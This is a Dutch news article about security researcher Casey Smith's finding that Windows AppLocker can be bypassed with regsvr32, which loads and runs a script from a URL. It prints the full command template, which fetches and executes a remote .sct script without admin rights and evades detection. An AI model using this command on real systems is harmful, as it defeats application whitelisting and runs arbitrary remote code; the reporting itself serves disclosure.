De Amerikaanse beveiligingsonderzoeker Casey Smith heeft in een blogpost gepubliceerd dat de Windows-software AppLocker eenvoudig omzeild kan worden. Daardoor is het bijvoorbeeld mogelijk om programma's uit te voeren die niet door AppLocker zijn toegestaan.
AppLocker maakt het mogelijk om het gebruik van programma's per gebruiker in te stellen en daarmee onder andere het uitvoeren van bepaalde toepassingen te beperken. De software is aanwezig in Windows 7 en hoger. Smith kwam erachter dat de beveiliging te omzeilen is door het programma regsvr32. Dit zorgt er normaal gesproken voor dat bijvoorbeeld dll-bestanden worden geregistreerd in het Windows-register. Smith ontdekte de methode toen hij een toepassing wilde uitvoeren op een werkstation dat bepaalde handelingen beperkte met AppLocker.
Het omzeilen van de beveiliging werkt doordat regsvr32 scripts accepteert in de vorm van een url. Dit feit is volgens Smith maar bij weinigen bekend en heeft een aantal voordelen: "Het geweldige is dat regsvr32 gebruikmaakt van een aanwezige proxy, tls gebruikt en redirects volgt. Het is ook een ondertekende standaard Windows-binary." Voor het uitvoeren van een script is alleen nodig dat dit op een locatie aanwezig is die de gebruiker beheert, vult Smith aan. Hij heeft ter illustratie een proof of concept aangemaakt.
De onderzoeker geeft aan dat de nodige code zeer kort is en zo nodig in een tweet zou passen. Het commando neemt deze vorm aan: regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll, waarbij het sct-bestand het uit te voeren script bevat. Het is ook mogelijk andere extensies te gebruiken, bijvoorbeeld een xml-bestand met javascript, zoals The Register aantoont. Een bijkomstigheid is dat er bij deze techniek geen COM-object in het register wordt opgenomen en dat deze mede daardoor lastig vast te stellen is. Bovendien is er geen beheerderstoegang nodig om het commando uit te voeren. Er is op dit moment nog geen patch van Microsoft beschikbaar.